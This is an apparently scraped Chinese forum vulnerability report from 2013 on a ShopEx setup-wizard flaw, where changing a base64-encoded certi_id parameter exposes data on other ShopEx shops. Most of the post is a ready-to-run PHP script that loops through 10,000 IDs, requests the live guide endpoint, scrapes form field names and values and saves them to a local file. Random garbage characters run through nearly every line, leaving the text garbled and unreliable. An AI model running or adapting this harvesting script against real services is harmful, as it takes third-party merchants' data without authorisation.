|
|
简要描述:
8 Y$ Z A2 e. Q1 r+ OShopEx某接口缺陷,可遍历所有网站: p" d% E5 l* ^2 x1 B
详细说明:
; R" z0 g* E9 G: e1 o问题出现在shopex 网店使用向导页面 . K1 O, k2 v" {, Y; _) {; t3 E
: I4 `% f4 @5 B7 d; E/ x& s2 M) j+ v4 o3 e+ \/ z
% B* a3 ^1 q$ K3 g0 n/ @9 w
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=& h; I9 C7 h3 ^+ t( |6 d
* R! o9 K" g* M# Z
' N+ P7 u4 G( {3 r# p/ }( K: _0 I ]2 j$ s
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}0 e+ x$ U; `3 o. t+ i3 o4 E
) C% n ?: N7 Y# k% F- ?* K. K' p' `. S* S2 w
* z) k% X/ P6 j6 B; R( |5 g0 L我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 ( U& q# g& {) l% o8 t2 m
- m; j V* x8 Z8 X b' Y. A4 \! {
7 s' o+ c5 S: i# Q& W7 _3 S( N' B( S- }+ k
<?php
. m8 [ H: i' `8 z X0 V. Q+ m
8 @4 {+ v+ a0 r% ?' Y for ($i=1; $i < 10000; $i++) { //遍历. N! K1 f. @* w2 j! D
8 d2 y$ g1 U+ x! S4 g' R R
ShowshopExD($i);, [) N# O) \2 m7 T5 p# _; G7 r
1 H0 m+ O+ F6 Q! ~! w) R. C& q }
2 i" m4 v" p/ @- A
0 \! h6 M8 s/ B* _ N& B: P function ShowshopExD($cid) {
, w. r" I7 s! e% d8 Y8 {0 J- L1 B" Q. Z; u
$url='http://guide.ecos.shopex.cn/step2.php';& w( L7 z. R! r) {2 F ^
) K+ s' R4 p1 `: f5 a $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');+ ^ e) _3 E& {" v- I* I
6 j: H" A" ~1 ~6 W
$url = $url.'?refer='.$refer;
2 C0 Z( h: n4 R2 X0 O* ^ N& A
% `0 S8 m6 ^: t2 |& r4 \) i9 ~ $ch = curl_init($url);
W* Z+ x* t; z0 G& v) W4 T+ p" c& I: }' h+ X: R2 O8 [
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
) ~* ?3 a4 u' w& O( I" X2 x2 q" b
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;5 ] Q# i7 v! S& f# C5 o0 d! N/ W
& Q& y" V- Y3 d/ }" P' b; n. k) m $result = curl_exec($ch);0 _& S( H) D- ]0 ?4 w
+ s% f( E e3 J) r2 o $result = mb_convert_encoding($result, "gb2312", "UTF-8");
; \: W5 C9 k# d) q+ y& q, A1 j* I0 V/ h7 D( t5 ~6 Z# ^6 Y) g
if(strpos($result,$refer)); e( ]+ ?5 F6 W: ^$ k# x7 F! N: |
. Z; t+ Q& E) \) n8 U7 {
{9 Q% A* |0 ^1 Q
6 k; U; q" ^5 X3 D% g: F
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
9 N! ` X6 v! R7 _" W2 }+ { B; C& J E l4 R9 D P
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
/ e9 A) `3 c: S2 ?/ Z4 K9 `! p6 R2 T- k! c1 Q
foreach ($value[1] as $key) {
- L3 I+ d; d+ t% U# Z, f7 d( o3 z5 t
& R6 K' a$ I. b8 J2 v- x preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
2 l3 o- d/ Z% w; ^9 |2 R D t
, Z3 E- p% x7 W( x$ a, G" W4 l" u echo $res[1][0].':'.$res[3][0]."\r\n";5 n5 r% W% A; j: B/ P
/ e/ t7 P4 Q1 K3 H( h: i" f $col =$res[1][0].':'.$res[3][0]."\r\n"; & J9 a W, k4 [- U3 g9 C
! x% E5 U% j. z0 a5 w: y
fwrite($fp, $col, strlen($col)); * j6 u9 w! ?# G- {1 h' {7 L/ s
( d* t4 `7 F! X) \! p2 P( n3 C: e; C }+ I# c4 M V9 u7 F
$ d1 n* R7 x0 X) Y( ?/ a8 \4 u+ ~ echo '--------------------------------'."\r\n";
) B# i: Z0 R' s( J: z) Y) E5 @0 O8 k+ F
fclose($fp); 1 @0 [7 {$ l0 u# F9 x8 O
9 j" k( d9 W9 ]( h! C. j }
/ ]3 k9 U# P! @ D9 z& s7 {* V) V1 B
flush();
! J5 o. m* c+ \( w1 _7 Z: y+ a7 A- l1 O8 R7 F1 \
curl_close($ch);
; A5 i( M7 ^0 h
- r5 ]& }1 d- i. U }
- ?5 K. C2 s' C0 c! j7 M1 X! T
3 x1 o3 S/ `; G( t: p$ A?>
6 w) _; v" I* M3 A漏洞证明:
7 n5 M# s* a+ Q4 ^2 Fhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
' P1 i3 q! ^# R- W, hrefer换成其他加密方式0 F( G9 v* n6 I Y
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对